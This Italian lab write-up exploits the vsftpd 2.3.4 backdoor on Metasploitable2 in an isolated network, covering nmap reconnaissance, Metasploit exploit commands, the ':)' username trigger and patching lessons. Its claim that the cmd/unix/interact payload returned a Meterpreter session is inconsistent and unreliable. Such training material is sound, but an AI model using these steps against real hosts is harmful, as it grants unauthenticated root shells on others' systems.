
Sfruttare il backdoor di vsftpd 2.3.4 (CVE-2011-2523) su Metasploitable2 — un writeup di laboratorio pratico di pentesting che copre ricognizione, sfruttamento e rimedio.
Un laboratorio pratico che dimostra la scoperta e lo sfruttamento di una vulnerabilità backdoor nota in vsftpd 2.3.4, utilizzando un ambiente isolato Kali Linux ↔ Metasploitable2.
Esercitarsi nel flusso di lavoro principale del penetration testing — ricognizione, identificazione delle vulnerabilità, sfruttamento e verifica post-sfruttamento — contro una macchina target deliberatamente vulnerabile.
| Componente | Dettagli |
|---|---|
| Attaccante | Kali Linux 2026.1 (VMware) |
| Bersaglio | Metasploitable2 (VMware) |
| Rete | NAT, isolata da host/internet |
| IP del bersaglio | 192.168.233.129 |
Entrambe le VM sono state mantenute sullo stesso segmento di rete privato, isolate dalla rete reale, per garantire che l'esercitazione non avesse alcuna esposizione esterna.
nmap -sV -sC 192.168.233.129
È stata eseguita una scansione del target per individuare porte aperte e versioni dei servizi. I risultati includevano:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
...

La porta 21 eseguiva vsftpd 2.3.4. Questa specifica versione è pubblicamente nota per contenere una backdoor: nel 2011, l'archivio sorgente ufficiale di vsftpd è stato compromesso e vi è stato inserito codice malevolo. Effettuare il login con un nome utente contenente la stringa :) attiva un listener nascosto sulla porta TCP 6200, concedendo una shell remota senza autenticazione.
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run
L'exploit ha attivato con successo la backdoor e ha restituito una sessione Meterpreter.

sessions -i 1
sysinfo
getuid
Confermati la sessione attiva e il livello di accesso sull'host compromesso.


Ottenuto l'accesso completo a una shell remota con privilegi root sulla macchina target, senza richiedere autenticazione, sfruttando un singolo servizio obsoleto e contenente una backdoor.
Un singolo servizio obsoleto con una vulnerabilità pubblica nota è stato sufficiente per compromettere completamente il sistema — nessuno sviluppo di exploit personalizzato o tecnica avanzata richiesta. Questo evidenzia perché la gestione delle patch e l'igiene delle versioni sono fondamentali per la postura di sicurezza nel mondo reale.
Questa esercitazione è stata eseguita esclusivamente contro Metasploitable2, una macchina virtuale deliberatamente vulnerabile progettata per la formazione sulla sicurezza, all'interno di una rete di laboratorio isolata, senza alcuna connessione a sistemi di produzione o infrastrutture di terze parti.